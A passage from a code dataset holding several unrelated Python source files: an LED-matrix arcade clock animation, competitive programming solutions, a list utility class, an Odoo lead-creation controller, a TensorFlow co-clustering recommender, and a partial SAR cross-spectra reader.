the dot image is just one pixel of the\n# colon image) because this was adapted from an Arduino project and the\n# space constraints there were insane.\nSPRITE_COORDS = [\n (0, 16, 3, 5), (3, 16, 3, 5), (6, 16, 3, 5), (9, 16, 3, 5), # Digits 0-3\n (12, 16, 3, 5), (15, 16, 3, 5), (18, 16, 3, 5), # Digits 4-6\n (21, 16, 3, 5), (24, 16, 3, 5), (27, 16, 3, 5), # Digits 7-9\n (30, 17, 1, 3), # Colon (between HH:MM:SS)\n (30, 17, 1, 1), # Dot (between MM.DD.YY)\n (0, 38, 9, 9), (8, 46, 9, 9), (8, 54, 9, 9), # Outline for mouth\n (8, 62, 9, 9), (8, 54, 9, 9), (8, 46, 9, 9), # moving right (6 frames)\n (0, 38, 9, 9), (0, 29, 9, 9), (8, 29, 9, 9), # Outline for mouth\n (16, 29, 9, 9), (8, 29, 9, 9), (0, 29, 9, 9), # moving down (6 frames)\n (0, 38, 9, 9), (0, 46, 9, 9), (0, 54, 9, 9), # Outline for mouth\n (0, 62, 9, 9), (0, 54, 9, 9), (0, 46, 9, 9), # moving left (6 frames)\n (0, 38, 9, 9), (0, 21, 9, 9), (8, 21, 9, 9), # Outline for mouth\n (16, 21, 9, 9), (8, 21, 9, 9), (0, 21, 9, 9), # moving up (6 frames)\n (17, 40, 7, 7), (23, 46, 7, 7), (23, 52, 7, 7), # Mouth moving right\n (23, 59, 7, 7), (23, 52, 7, 7), (23, 46, 7, 7), # (6 frames)\n (17, 40, 7, 7), (0, 77, 7, 7), (6, 77, 7, 7), # Mouth moving down\n (13, 77, 7, 7), (6, 77, 7, 7), (0, 77, 7, 7), # (6 frames)\n (17, 40, 7, 7), (17, 46, 7, 7), (17, 52, 7, 7), # Mouth moving left\n (17, 59, 7, 9), (17, 52, 7, 7), (17, 46, 7, 7), # (6 frames)\n (17, 40, 7, 7), (0, 71, 7, 7), (6, 71, 7, 7), # Mouth moving up\n (13, 71, 7, 7), (6, 71, 7, 7), (0, 71, 7, 7), # (6 frames)\n (23, 66, 9, 9), (23, 75, 9, 9), # Ghost outline (2 frames)\n (25, 21, 7, 7), (25, 28, 7, 7), # Ghost (2 frames)\n (26, 38, 5, 3), (26, 42, 5, 3), # Ghost eyes (right, down)\n (26, 36, 5, 3), (26, 41, 5, 3), # Ghost eyes (left, up)\n (0, 0, 32, 16), # Playfield\n]\n\nSPRITE_COORDS_LARGE = [\n (0, 33, 7, 11), (8, 33, 7, 11), (16, 33, 7, 11), # Digits 0-2\n (24, 33, 7, 11), (32, 33, 7, 11), (40, 33, 7, 11), # Digits 3-5\n (48, 33, 7, 11), (56, 33, 7, 11), (64, 33, 7, 11), # Digits 6-8\n (72, 33, 7, 11), # 9\n (48, 45, 2, 5), # Colon (between HH:MM:SS)\n (48, 45, 2, 2), # Dot (between MM.DD.YY)\n (78, 15, 15, 15), (32, 45, 15, 15), (16, 45, 15, 15), # Outline for mouth\n (0, 45, 15, 15), (16, 45, 15, 15), (32, 45, 15, 15), # moving right (6)\n (78, 15, 15, 15), (32, 61, 15, 15), (16, 61, 15, 15), # Outline for mouth\n (0, 61, 15, 15), (16, 61, 15, 15), (32, 61, 15, 15), # moving down (6)\n (78, 15, 15, 15), (32, 77, 15, 15), (16, 77, 15, 15), # Outline for mouth\n (0, 77, 15, 15), (16, 77, 15, 15), (32, 77, 15, 15), # moving left (6)\n (78, 15, 15, 15), (32, 93, 15, 15), (16, 93, 15, 15), # Outline for mouth\n (0, 93, 15, 15), (16, 93, 15, 15), (32, 93, 15, 15), # moving up (6)\n (80, 31, 13, 13), (80, 45, 13, 13), (66, 45, 13, 13), # Mouth moving right\n (52, 45, 13, 13), (66, 45, 13, 13), (80, 45, 13, 13), # (6 frames)\n (80, 31, 13, 13), (80, 59, 13, 13), (66, 59, 13, 13), # Mouth moving down\n (52, 59, 13, 13), (66, 59, 13, 13), (80, 59, 13, 13), # (6 frames)\n (80, 31, 13, 13), (80, 73, 13, 13), (66, 73, 13, 13), # Mouth moving left\n (52, 73, 13, 13), (66, 73, 13, 13), (80, 73, 13, 13), # (6 frames)\n (80, 31, 13, 13), (80, 87, 13, 13), (66, 87, 13, 13), # Mouth moving up\n (52, 87, 13, 13), (66, 87, 13, 13), (80, 87, 13, 13), # (6 frames)\n (62, 101, 15, 15), (78, 101, 15, 15), # Ghost outline (2)\n (66, 0, 13, 13), (80, 0, 13, 13), # Ghost (2 frames)\n (66, 14, 9, 5), # Ghost eyes\n (67, 20, 7, 2), # Ghost pupils\n (0, 0, 64, 32), # Playfield = 66\n]\n\ndef 
orient_small(frac):\n \"\"\"Given a fractional value (0.0 to 1.0), determine the corresponding\n pixel index around the perimeter of the maze (there are 68 distinct\n viable pixel positions around the 32x16 image).\"\"\"\n pixel = int(frac * 68)\n if pixel < 25:\n x_pos = pixel\n y_pos = 0\n direction = 0 # Right\n elif pixel < 34:\n x_pos = 25\n y_pos = pixel - 25\n direction = 1 # Down\n elif pixel < 59:\n x_pos = 58 - pixel\n y_pos = 9\n direction = 2 # Left\n else:\n x_pos = 0\n y_pos = 67 - pixel\n direction = 3 # Up\n return x_pos, y_pos, direction\n\ndef orient_large(frac):\n \"\"\"Given a fractional value (0.0 to 1.0), determine the corresponding\n pixel index around the perimeter of the maze (there are 136 distinct\n viable pixel positions around the 64x32 image).\"\"\"\n# 50 across, 18 high\n pixel = int(frac * 136)\n if pixel < 50:\n x_pos = pixel + 1\n y_pos = 1\n direction = 0 # Right\n elif pixel < 68:\n x_pos = 50\n y_pos = pixel - 49\n direction = 1 # Down\n elif pixel < 118:\n x_pos = 118 - pixel\n y_pos = 18\n direction = 2 # Left\n else:\n x_pos = 1\n y_pos = 136 - pixel\n direction = 3 # Up\n return x_pos, y_pos, direction\n\nclass Sprite(object):\n \"\"\"Movable graphics entities. These don't themselves contain bitmap data,\n but have an index into the main applications sprite_data[] array.\"\"\"\n def __init__(self, image_index, x_pos, y_pos, color):\n self.image_index = image_index\n self.x_pos = x_pos\n self.y_pos = y_pos\n self.color = color\n self.brightness = 1.0\n self.off_time = -100.0\n\n def reframe(self, idx, x_pos, y_pos):\n \"\"\"Assign a new image index and (X,Y) position to a Sprite.\"\"\"\n self.image_index = idx\n self.x_pos = x_pos\n self.y_pos = y_pos\n\n def adjusted_brightness(self):\n \"\"\"Return a Sprite's color with its current brightness applied.\"\"\"\n brightness = self.brightness ** 0.8\n return (int(self.color[0] * brightness),\n int(self.color[1] * brightness),\n int(self.color[2] * brightness))\n\nclass ArcadeClock(SpectroBase):\n \"\"\"Arcade clock for Spectro.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(ArcadeClock, self).__init__(*args, **kwargs)\n\n self.sprite_data = None\n self.sprite_list = None\n self.sprite_coords_list = None\n self.current_time = 0\n self.image = None\n self.draw = None\n\n def set_two_digits(self, first_sprite, value):\n \"\"\"Set the image indices for two adjacent Sprites, used for\n assigning two-digit numbers (e.g. 
HH, MM, SS, etc.).\"\"\"\n self.sprite_list[first_sprite].image_index = value // 10\n self.sprite_list[first_sprite + 1].image_index = value % 10\n\n def draw_mouth_small(self):\n \"\"\"Animate mouth around small (32x16) maze.\"\"\"\n frac = (self.current_time % 3.5) / 3.5 # 3.5 seconds per lap\n x_pos, y_pos, direction = orient_small(frac)\n frame = int((self.current_time % 0.3) * 20.0) # 0 to 5\n self.sprite_list[17].reframe(12 + direction * 6 + frame,\n x_pos - 1, y_pos - 1)\n self.sprite_list[19].reframe(36 + direction * 6 + frame,\n x_pos, y_pos)\n return frac, x_pos, y_pos\n\n def draw_mouth_large(self):\n \"\"\"Animate mouth around large (64x32) maze.\"\"\"\n frac = (self.current_time % 3.5) / 3.5 # 3.5 seconds per lap\n x_pos, y_pos, direction = orient_large(frac)\n frame = int((self.current_time % 0.3) * 20.0) # 0 to 5\n self.sprite_list[17].reframe(12 + direction * 6 + frame,\n x_pos - 1, y_pos - 1)\n self.sprite_list[19].reframe(36 + direction * 6 + frame,\n x_pos, y_pos)\n return frac, x_pos, y_pos\n\n def draw_ghost_small(self, frac):\n \"\"\"Animate ghost around small (32x16) maze.\"\"\"\n # Make ghost follow mouth, slightly behind\n x_pos, y_pos, direction = orient_small((frac - 0.18) % 1.0)\n frame = int((self.current_time % 1.0) * 2.0)\n self.sprite_list[18].reframe(60 + frame, x_pos - 1, y_pos - 1)\n self.sprite_list[20].reframe(62 + frame, x_pos, y_pos)\n self.sprite_list[21].reframe(64 + direction, x_pos + 1, y_pos + 1)\n\n def draw_ghost_large(self, frac):\n \"\"\"Animate ghost around large (64x32) maze.\"\"\"\n # Make ghost follow mouth, slightly behind\n x_pos, y_pos, direction = orient_large((frac - 0.15) % 1.0)\n frame = int((self.current_time % 1.0) * 2.0)\n self.sprite_list[18].reframe(60 + frame, x_pos - 1, y_pos - 1)\n self.sprite_list[20].reframe(62 + frame, x_pos, y_pos)\n eye_offset = [(3, 3), (2, 4), (1, 3), (2, 2)]\n pupil_offset = [(5, 5), (3, 7), (1, 5), (3, 2)]\n self.sprite_list[21].reframe(64, x_pos + eye_offset[direction][0],\n y_pos + eye_offset[direction][1])\n self.sprite_list[22].reframe(65, x_pos + pupil_offset[direction][0],\n y_pos + pupil_offset[direction][1])\n\n def eat_digits(self, x_pos, y_pos, offset, dist):\n \"\"\"Make the mouth \"eat\" clock digits.\"\"\"\n # Making the mouth eat digits is pretty brute force...\n # position of sprite center is compared against mouth center.\n # if +/- 'dist' pixels, consider that sprite \"eaten\" (set its\n # brightness to 0). This is not foolproof...if the frame rate\n # is super chunky (e.g. Pi Zero under heavy load), it's\n # possible (though I don't know how probable) that some\n # digits may be skipped. 
This would be visually annoying but\n # is not actually destructive.\n x_pos += offset\n y_pos += offset\n dist *= dist # Pixel distance squared (avoids a sqrt())\n for sprite in self.sprite_list[1:17]:\n idx = sprite.image_index\n delta_x = x_pos - (sprite.x_pos +\n self.sprite_coords_list[idx][2] // 2)\n delta_y = y_pos - (sprite.y_pos +\n self.sprite_coords_list[idx][3] // 2)\n if delta_x * delta_x + delta_y * delta_y <= dist:\n sprite.off_time = self.current_time\n sprite.brightness = 0.0\n else:\n sprite.brightness = min(\n 1.0, max(0.0, self.current_time - sprite.off_time - 1.0))\n\n def load_sprites(self, large):\n \"\"\"Load sprite sheet and extract sprite rasters from it.\"\"\"\n if large:\n filename = 'graphics/arcade-bitmasks-large.png'\n self.sprite_coords_list = SPRITE_COORDS_LARGE\n else:\n filename = 'graphics/arcade-bitmasks.png'\n self.sprite_coords_list = SPRITE_COORDS\n\n # Load sprite sheet and extract individual sprite rasters from it\n sprite_graphics = Image.open(filename)\n self.sprite_data = []\n for coords in self.sprite_coords_list:\n self.sprite_data.append(\n sprite_graphics.crop((coords[0], coords[1], # X0, Y0\n coords[0] + coords[2], # X1\n coords[1] + coords[3]))) # Y1\n\n # Sprite objects in back-to-front render order. For each Sprite,\n # first element is an index to a sprite image (in sprite_data[]\n # array) -- many of these are assigned 0 to start, which is then\n # overridden in the logic loop. Second and third elements are X & Y\n # position on matrix (again many are initialized to 0 and changed\n # later), last element is sprite color (also sometimes initialized\n # 0 and changed later).\n # This is a bit messy because the list has to be build in \"stacking\n # order\" -- as sprites will be rendered back-to-front.\n self.sprite_list = [\n Sprite(len(self.sprite_coords_list) - 1, 0, 0,\n (33, 33, 255)) # Maze\n ]\n if large:\n self.sprite_list += [\n Sprite(0, 5, 2, (255, 183, 174)), # H\n Sprite(0, 13, 2, (255, 183, 174)), # H\n Sprite(10, 21, 5, (255, 183, 174)), # :\n Sprite(0, 24, 2, (255, 183, 174)), # M\n Sprite(0, 32, 2, (255, 183, 174)), # M\n Sprite(10, 40, 5, (255, 183, 174)), # :\n Sprite(0, 43, 2, (255, 183, 174)), # S\n Sprite(0, 51, 2, (255, 183, 174)), # S\n\n Sprite(0, 5, 19, (255, 183, 174)), # M\n Sprite(0, 13, 19, (255, 183, 174)), # M\n Sprite(11, 21, 23, (255, 183, 174)), # -\n Sprite(0, 24, 19, (255, 183, 174)), # D\n Sprite(0, 32, 19, (255, 183, 174)), # D\n Sprite(11, 40, 23, (255, 183, 174)), # -\n Sprite(0, 43, 19, (255, 183, 174)), # Y\n Sprite(0, 51, 19, (255, 183, 174))] # Y\n else:\n self.sprite_list += [\n Sprite(0, 2, 1, (255, 183, 174)), # H\n Sprite(0, 6, 1, (255, 183, 174)), # H\n Sprite(10, 10, 2, (255, 183, 174)), # :\n Sprite(0, 12, 1, (255, 183, 174)), # M\n Sprite(0, 16, 1, (255, 183, 174)), # M\n Sprite(10, 20, 2, (255, 183, 174)), # :\n Sprite(0, 22, 1, (255, 183, 174)), # S\n Sprite(0, 26, 1, (255, 183, 174)), # S\n Sprite(0, 2, 10, (255, 183, 174)), # M\n Sprite(0, 6, 10, (255, 183, 174)), # M\n Sprite(11, 10, 12, (255, 183, 174)), # -\n Sprite(0, 12, 10, (255, 183, 174)), # D\n Sprite(0, 16, 10, (255, 183, 174)), # D\n Sprite(11, 20, 12, (255, 183, 174)), # -\n Sprite(0, 22, 10, (255, 183, 174)), # Y\n Sprite(0, 26, 10, (255, 183, 174))] # Y\n self.sprite_list += [\n Sprite(0, 0, 0, (0, 0, 0)), # Mouth outline\n Sprite(0, 0, 0, (0, 0, 0)), # Ghost outline\n Sprite(0, 0, 0, (255, 255, 0)), # Mouth\n Sprite(0, 0, 0, (255, 0, 0)), # Ghost\n Sprite(64, 0, 0, (222, 222, 255))] # Eyes\n if large:\n 
self.sprite_list += [Sprite(65, 0, 0, (0, 0, 222))] # Pupils\n\n\n def run(self):\n\n # Create offscreen buffer for graphics\n double_buffer = self.matrix.CreateFrameCanvas()\n\n # Create PIL image and drawing context\n self.image = Image.new(\"RGB\", (self.matrix.width, self.matrix.height))\n self.draw = ImageDraw.Draw(self.image)\n\n self.load_sprites(self.matrix.width > 32)\n\n while True:\n\n self.current_time = time.time()\n\n localtime = time.localtime(self.current_time)\n if TWELVE_HOUR:\n hour = localtime.tm_hour % 12\n if hour == 0:\n hour = 12\n else:\n hour = localtime.tm_hour\n\n # Configure time sprites (HH:MM:SS)\n self.set_two_digits(1, hour)\n self.set_two_digits(4, localtime.tm_min)\n self.set_two_digits(7, localtime.tm_sec)\n\n # Configure date sprites (MM.DD.YY) or (YY:MM:DD)\n if EURO_DATE:\n self.set_two_digits(9, localtime.tm_year % 100)\n self.set_two_digits(12, localtime.tm_mon)\n self.set_two_digits(15, localtime.tm_mday)\n else:\n self.set_two_digits(9, localtime.tm_mon)\n self.set_two_digits(12, localtime.tm_mday)\n self.set_two_digits(15, localtime.tm_year % 100)\n\n # Animate mouth around maze\n if self.matrix.width > 32:\n frac, x_pos, y_pos = self.draw_mouth_large()\n self.eat_digits(x_pos, y_pos, 6, 2)\n self.draw_ghost_large(frac)\n else:\n frac, x_pos, y_pos = self.draw_mouth_small()\n self.eat_digits(x_pos, y_pos, 3, 2)\n self.draw_ghost_small(frac)\n\n # Clear image, draw sprites in back-to-front order:\n self.draw.rectangle((0, 0, self.matrix.width, self.matrix.height),\n fill=0)\n for sprite in self.sprite_list:\n self.image.paste(\n sprite.adjusted_brightness(),\n (sprite.x_pos, sprite.y_pos,\n sprite.x_pos + self.sprite_coords_list[\n sprite.image_index][2],\n sprite.y_pos + self.sprite_coords_list[\n sprite.image_index][3]),\n mask=self.sprite_data[sprite.image_index])\n\n # Copy PIL image to matrix buffer, swap buffers each frame\n double_buffer.SetImage(self.image)\n double_buffer = self.matrix.SwapOnVSync(double_buffer)\n\nif __name__ == \"__main__\":\n MY_APP = ArcadeClock() # Instantiate class, calls __init__() above\n MY_APP.process() # SpectroBase startup, calls run() above\n","repo_name":"adafruit/Adafruit_Spectro_Pi","sub_path":"arcade_clock.py","file_name":"arcade_clock.py","file_ext":"py","file_size_in_byte":17879,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"15141648669","text":"from collections import defaultdict\r\ndef inpl(): return list(map(int,input().split()))\r\n\r\nclass Counter:\r\n def __init__(self, start=0):\r\n self.index = start-1\r\n\r\n def __call__(self):\r\n self.index += 1\r\n return self.index\r\n\r\nui = defaultdict(Counter())\r\nxylist = []\r\n\r\nH, W, N = inpl()\r\nfor i in range(N):\r\n X, Y = inpl()\r\n n = ui[X]\r\n if n < len(xylist):\r\n xylist[n][1] = min(xylist[n][1],Y)\r\n else:\r\n xylist.append([X,Y])\r\n\r\nxylist.sort(key=lambda x: x[0])\r\nxylist.append([H+1,1])\r\n\r\nXprev = Yprev = 1\r\nfor X, Y in xylist:\r\n Ybound = Yprev + X - Xprev \r\n if Y < Ybound:\r\n ans = X - 1\r\n break\r\n elif Y == Ybound:\r\n Xprev, Yprev = X, Ybound - 1\r\n else:\r\n Xprev, Yprev = X, Ybound\r\n\r\nprint(ans)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc029/D/4561604.py","file_name":"4561604.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"41146478720","text":"from BasicLibrary import ObjectHelper\n\n\nclass ListHelper:\n 
\"\"\"\n\n \"\"\"\n\n @staticmethod\n def get(list_data, index, default_value=None):\n \"\"\"\n 安装索引,安全地从数组中获取元素\n :param default_value:\n :param list_data:\n :param index:元素的索引号\n :return:返回索引指定的元素;如果指定的索引号在数组内不存在,返回 None。\n \"\"\"\n if ObjectHelper.is_empty(list_data):\n return default_value\n else:\n list_length = ObjectHelper.get_length(list_data)\n if list_length == 0:\n return default_value\n else:\n if index >= list_length:\n return default_value\n else:\n return list_data[index]\n\n @staticmethod\n def get_index(list_data, value, item_property=None):\n \"\"\"\n 获取某个元素在list中的index\n :param list_data:\n :param value:\n :param item_property:\n :return:\n \"\"\"\n if type(list_data) is not enumerate:\n list_data = enumerate(list_data)\n\n for index, item in list_data:\n if item_property:\n comparing_data = item[item_property]\n else:\n comparing_data = item\n\n if comparing_data == value:\n return index\n\n return None\n\n @staticmethod\n def remove_duplication_item(data):\n \"\"\"\n 为list去除重复项\n :param data:\n :return:\n \"\"\"\n return list(set(data))\n\n # 以下获取交集并集差集的算法,只支持元素为简单类型的list\n @staticmethod\n def get_union(list_a, list_b):\n \"\"\"\n 获取并集\n :param list_a:\n :param list_b:\n :return:\n \"\"\"\n return list(set(list_a).union(set(list_b)))\n\n @staticmethod\n def get_intersection(list_a, list_b):\n \"\"\"\n 获取交集\n :param list_a:\n :param list_b:\n :return:\n \"\"\"\n return list(set(list_a).intersection(set(list_b)))\n\n @staticmethod\n def get_difference_only_in_left(list_left, list_right):\n \"\"\"\n 获取单向差集(在左侧中有的元素,在右侧中没有的元素)\n :param list_left:\n :param list_right:\n :return:\n \"\"\"\n return list(set(list_left).difference(set(list_right)))\n\n @staticmethod\n def get_difference_only_in_right(list_left, list_right):\n \"\"\"\n 获取单向差集(在左侧中没有的元素,在右侧中有的元素)\n :param list_left:\n :param list_right:\n :return:\n \"\"\"\n return list(set(list_right).difference(set(list_left)))\n\n @staticmethod\n def get_difference_all(list_left, list_right):\n \"\"\"\n 获取双向差集(在左侧中有,右侧中没有;以及在右侧中有,左侧中没有 的所有数据的集合)\n :param list_left:\n :param list_right:\n :return:\n \"\"\"\n return list(set(list_left) ^ set(list_right))\n\n @staticmethod\n def sort(list_data, callback_in__list__item_out__item_property=None, reverse=False):\n \"\"\"\n 对数组内的元素进行排序\n :param reverse:\n :param list_data:\n :param callback_in__list__item_out__item_property: 排序规则的回调函数\n 入参为:数组的元素\n 返回值为:数组元素的某个属性名称字符串\n :return:\n :example:\n actual = ListHelper.sort(cars, lambda item: item[\"year\"])\n expected = [{'car': 'Audi', 'year': 2010},\n {'car': 'Volvo', 'year': 2013},\n {'car': 'BMW', 'year': 2019},\n {'car': 'Porsche', 'year': 2023}]\n assert actual == expected\n \"\"\"\n if callback_in__list__item_out__item_property:\n list_data.sort(key=callback_in__list__item_out__item_property, reverse=reverse)\n else:\n list_data.sort(reverse=reverse)\n\n return list_data\n\n @staticmethod\n def merge(*args):\n \"\"\"\n 合并两个 list\n :param list args:\n :return:\n \"\"\"\n result = []\n for key in args:\n result += key\n\n return result\n\n @staticmethod\n def reverse(list_data):\n \"\"\"\n 返回翻转顺序的 list(翻转的list,不影响原来输入的list)\n :param list_data:\n :return:\n \"\"\"\n return list(reversed(list_data))\n\n pass\n","repo_name":"notinmood/BasicLibrary.PY","sub_path":"BasicLibrary/data/listHelper.py","file_name":"listHelper.py","file_ext":"py","file_size_in_byte":4623,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15156325309","text":"# coding:utf-8\r\n\r\nimport sys\r\nfrom 
operator import itemgetter\r\n\r\n\r\nINF = float('inf')\r\nMOD = 10 ** 9 + 7\r\n\r\n\r\ndef LI(): return [int(x) for x in sys.stdin.readline().split()]\r\n\r\n\r\nclass SegmentTree:\r\n    __slots__ = ['node', 'size']\r\n\r\n    def __init__(self, n_):\r\n        self.size = 2 ** n_.bit_length()\r\n        self.node = [INF] * (2 * self.size)\r\n\r\n    # set the value at position k to a\r\n    def update(self, k, a):\r\n        k += self.size - 1\r\n        self.node[k] = a\r\n        # propagate the change up towards the root\r\n        while k >= 0:\r\n            k = (k - 1) // 2\r\n            self.node[k] = min(self.node[k * 2 + 1], self.node[k * 2 + 2])\r\n\r\n    # minimum over the half-open interval [a, b)\r\n    def query(self, a, b):\r\n        l, r = a + self.size, b + self.size\r\n        res = INF\r\n        while l < r:\r\n            if r & 1:\r\n                r -= 1\r\n                res = min(res, self.node[r - 1])\r\n\r\n            if l & 1:\r\n                res = min(res, self.node[l - 1])\r\n                l += 1\r\n\r\n            l >>= 1\r\n            r >>= 1\r\n        return res\r\n\r\n\r\nn, L = LI()\r\nsgt = SegmentTree(L + 1)\r\nQ = [tuple(LI()) for _ in range(n)]\r\nQ.sort()\r\n\r\ndp = [INF] * (L + 1)\r\ndp[0] = 0\r\nsgt.update(0, 0)\r\nfor i in range(n):\r\n    l, r, c = Q[i]\r\n    cost = sgt.query(l, r) + c\r\n    if cost < dp[r]:\r\n        dp[r] = cost\r\n        sgt.update(r, cost)\r\n\r\nprint(dp[-1])","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/arc026/C/4342532.py","file_name":"4342532.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"30257571231","text":"from odoo import http\nfrom odoo.http import request\n\n\nclass AddNewLeadController(http.Controller):\n\n    @http.route('/add_new_lead', type='http', auth=\"public\", methods=['POST'], website=True, csrf=False)\n    def add_new_lead(self, **post):\n        client_name = post.get('client_name')\n        client_email = post.get('client_email')\n        client_phone = post.get('client_phone')\n        subject = post.get('subject')\n\n        # Create new lead record\n        lead = request.env['crm.lead']\n        lead_data = {\n            'name': client_name,\n            'email_from': client_email,\n            'phone': client_phone,\n            'description': subject,\n        }\n        new_lead = lead.create(lead_data)\n\n        return \"Lead Created Successfully\"\n\n","repo_name":"igruk/open_academy","sub_path":"controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"7918124513","text":"from recsyslib.als.alsmixin import ALSMixin\nimport tensorflow as tf\n\n\nclass BVD(ALSMixin):\n    def __init__(\n        self,\n        num_users,\n        num_items,\n        num_rowclusters,\n        num_columnclusters,\n        name=\"bvd\",\n        **kwargs\n    ):\n        \"\"\"Implementation of:\n        Long, B. Zhang, Z., Yu, P. 2005. 
Co-clustering by block value decomposition.\n        KDD '05: Pages 635–640 https://doi.org/10.1145/1081870.1081949\n\n        This implementation uses tensorflow for faster compiled math operations, not optimization.\n        These are multiplicative updates as in the original paper.\n\n        Args:\n            num_users (int): number of users\n            num_items (int): number of items\n            num_rowclusters (int): number of row clusters\n            num_columnclusters (int): number of column clusters\n            name (str): date/model name\n        \"\"\"\n\n        self.name = name\n        self.latent_dim2 = num_columnclusters\n        super().__init__(\n            num_users, num_items, latent_dim=num_rowclusters, **kwargs\n        )\n        self.R = tf.Variable(\n            tf.random.uniform(\n                minval=0.001,\n                maxval=1.0,\n                shape=(self.num_users, self.latent_dim2),\n            ),\n            trainable=False,\n            name=\"R\",\n        )\n        self.B = tf.Variable(\n            tf.random.uniform(\n                minval=0.001,\n                maxval=1.0,\n                shape=(self.latent_dim2, self.latent_dim),\n            ),\n            trainable=False,\n            name=\"B\",\n        )\n        self.C = tf.Variable(\n            tf.random.uniform(\n                minval=0.001,\n                maxval=1.0,\n                shape=(self.latent_dim, self.num_items),\n            ),\n            trainable=False,\n            name=\"C\",\n        )\n\n    def interact_to_confidence(self, y):\n        return y\n\n    @property\n    def item_embeddings(self):\n        return self.C.numpy().T\n\n    @property\n    def user_embeddings(self):\n        return self.R.numpy()\n\n    def update_R(self, Z, C, B, R):\n        return (\n            R\n            * (\n                tf.sparse.sparse_dense_matmul(Z, tf.transpose(C))\n                @ tf.transpose(B)\n            )\n            / (R @ B @ C @ tf.transpose(C) @ tf.transpose(B))\n        )\n\n    def update_B(self, Z, C, B, R):\n        return (\n            B\n            * (tf.transpose(R) @ tf.sparse.to_dense(Z) @ tf.transpose(C))\n            / (tf.transpose(R) @ R @ B @ C @ tf.transpose(C))\n        )\n\n    def update_C(self, Z, C, B, R):\n        return (\n            C\n            * (tf.transpose(B) @ tf.transpose(R) @ tf.sparse.to_dense(Z))\n            / (tf.transpose(B) @ tf.transpose(R) @ R @ B @ C)\n        )\n\n    @tf.function\n    def call(self, inputs):\n        Z = inputs\n        self.R.assign(self.update_R(Z, self.C, self.B, self.R))\n        self.B.assign(self.update_B(Z, self.C, self.B, self.R))\n        self.C.assign(self.update_C(Z, self.C, self.B, self.R))\n\n    @tf.function\n    def mse(self, Z):\n        # eq (1)\n        return tf.reduce_mean(\n            tf.pow(tf.sparse.to_dense(Z) - self.R @ self.B @ self.C, 2)\n        )\n","repo_name":"TimSchmeier/recsys-lib","sub_path":"recsyslib/als/bvd.py","file_name":"bvd.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32879863747","text":"# The file is opened, read and closed\nhandle= open(\"quotes.txt\", \"r\")\nfile_read=handle.read()\nprint('This is the open/close method \\n',file_read)\nhandle.close()\n\n# The file is closed automatically by using with statement\nwith open(\"quotes.txt\", \"r\") as handle:\n    file_read=handle.read()\n    print('This is the with option \\n',file_read)\n\n# For loop is used to read the file\nwith open(\"quotes.txt\", \"r\") as handle:\n    print(\"File is read using a for loop line by line\")\n    for line in handle:\n        print (line.strip())\n","repo_name":"ahmetnuriozcelik/python","sub_path":"read-txt-files.py","file_name":"read-txt-files.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31656411398","text":"import pdb\n\nimport xarray as xr\nimport logging\n\n\ndef compute_xs_from_l1b(_file, burst_type='intra', time_separation='2tau'):\n    \"\"\"\n\n    Args:\n        _file\n            (str) full path L1B nc file\n        burst_type\n            (str) intra or inter\n        time_separation\n            (str) 2tau or 1tau...\n\n    Returns:\n\n    \"\"\"\n    # Reading the l1b file\n    # Loading the specified burst group\n    # dt = 
datatree.open_datatree(_file)\n    # Version 1.4\n    # ds = xr.open_dataset(_file,group=burst_type+'burst_xspectra')\n    # Version 1.4a\n    if 'wv' in _file:\n        ds = xr.open_dataset(_file, group=burst_type)\n    else:\n        ds = xr.open_dataset(_file, group=burst_type + 'burst')\n\n    # ds = dt[burst_type+'burst_xspectra'].to_dataset()\n    # drop variables\n\n    logging.debug('time_separation : %s', time_separation)\n    if burst_type == 'intra':\n        consolidated_list = []\n        list_to_drop = ['var_xspectra_0tau', 'var_xspectra_1tau', 'var_xspectra_2tau']\n        for toto in range(0, 2):\n            if int(time_separation[0]) != toto:\n                list_to_drop.append('xspectra_' + str(toto) + 'tau' + '_Re')\n                list_to_drop.append('xspectra_' + str(toto) + 'tau' + '_Im')\n        for vv in list_to_drop:\n            if vv not in ds:\n                logging.warning('%s not present in the dataset %s', vv, burst_type)\n            else:\n                consolidated_list.append(vv)\n        ds = ds.drop_vars(consolidated_list)\n    else:  # inter burst case\n        pass  # no variable to remove in interburst\n\n    if burst_type == 'intra' or burst_type == '':\n        if 'xspectra_' + time_separation + '_Re' not in ds or 'xspectra_' + time_separation + '_Im' not in ds:\n            xsRe = None\n            xsIm = None\n        else:\n            xsRe = ds['xspectra_' + time_separation + '_Re']  # +1j*ds_intra['xspectra_1tau_Im']).mean(dim=['1tau'])\n            xsIm = ds['xspectra_' + time_separation + '_Im']\n            if time_separation == '2tau':\n                xsRe = xsRe.squeeze('2tau')\n                xsIm = xsIm.squeeze('2tau')\n            if time_separation == '1tau':\n                xsRe = xsRe.mean(dim=['1tau'])\n                xsIm = xsIm.mean(dim=['1tau'])\n\n    elif burst_type == 'inter':\n        if 'xspectra_Re' in ds:\n            xsRe = ds['xspectra_Re']  # +1j*ds_inter['xspectra_Im']\n            xsIm = ds['xspectra_Im']\n        else:\n            logging.warning('xspectra_Re absent from interburst group')\n            xsRe = None\n            xsIm = None\n    else:  # WV case\n        raise Exception('unhandled case')\n    if xsRe is None:\n        xs = None\n    else:\n        xs = xsRe + 1j * xsIm\n    # Remove unique dimensions\n    # xs=xs.squeeze()\n    # convert the wavenumber variables in range and azimuth into coordinates after selection of one unique vector without any other dimension dependency\n    dims_to_average = []\n    if 'tile_sample' in xs.k_rg.dims:\n        dims_to_average.append('tile_sample')\n\n    if 'burst' in 